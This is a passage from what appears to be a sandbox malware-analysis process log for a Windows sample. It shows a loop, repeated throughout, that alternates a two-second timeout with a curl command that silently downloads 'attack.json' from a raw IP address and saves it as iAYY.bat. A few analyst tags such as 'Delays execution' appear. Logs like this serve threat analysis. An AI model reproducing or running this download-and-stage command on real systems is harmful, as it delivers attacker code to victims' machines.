  2⤵
  PID:4604
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4596
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1168
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2580
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4524
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3680
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1588
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1132
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3120
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2928
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3908
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3040
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2788
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:924
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2212
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2096
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:952
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4600
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1740
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4216
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3612
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:392
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4280
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1712
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1452
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:628
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:688
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4344
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1580
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1164
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3372
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4640
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4712
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2240
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1044
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2388
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2948
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2696
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4140
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4488
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1532
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1352
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4980
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2516
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2956
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4388
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4688
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4356
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3360
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4060
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3228
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4144
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:5112
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1880
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1048
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1744
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:680
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2140
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4876
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:5088
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3688
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4580
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2444
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3188
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3044
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4492
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4728
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1600
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3436
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2292
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4804
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2660
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1472
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4976
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4644
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1904
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4572
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4736
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3744
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4232
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4592
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:464
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:736
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1608
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3664
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1800
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:5116
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1172
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4880
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1804
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:980
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:8
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:5108
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1928
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1824
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3684
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4604
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2120
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1168
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2580
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1480
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3680
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:5056
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4516
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4324
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:984
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4832
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3040
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2788
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:924
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1272
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:988
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4164
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4984
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4696
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2392
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4416
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3640
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:5016
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1760
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3612
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4504
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3740
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:428
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:528
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1508
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2808
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4432
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1752
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1376
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1264
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:532
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1616
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4468
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1308
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3184
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2884
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1848
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2380
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1392
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:860
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1396
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4536
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1324
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4808
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1660
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2920
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4612
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:436
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4956
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:728
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1948
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3800
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4608
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4320
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:680
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:508
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:432
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2064
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2284
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:668
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1388
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2648
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1980
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4492
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4728
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1600
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3080
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2292
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4804
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2660
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1472
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3940
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3956
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4332
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2244
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3756
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3784
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4404
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4548
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3400
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:5076
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2024
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3508
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4204
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3168
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3904
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3992
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3016
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3212
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1652
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1172
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2036
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1804
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4700
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3144
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1444
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1928
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1808
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3008
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:5036
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2360
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3552
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3336
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:552
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2720
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1596
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3412
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1132
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1604
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:984
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4832
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3040
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2788
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:952
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4984
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4960
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2316
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2740
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:220
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4504
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3740
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:428
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:528
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:688
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2768
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4828
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2124
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1376
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3608
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4412
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:396
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2676
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2388
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2948
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2552
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1756
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:5060
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:740
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1352
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3416
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2224
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3796
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4388
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4688
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3304
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2296
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:5024
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4368
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1076
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2232
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1384
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4352
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4608
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1744
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1716
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4876
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3516
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3596
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:704
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4292
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3460
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3044
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2892
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3988
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4044
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3496
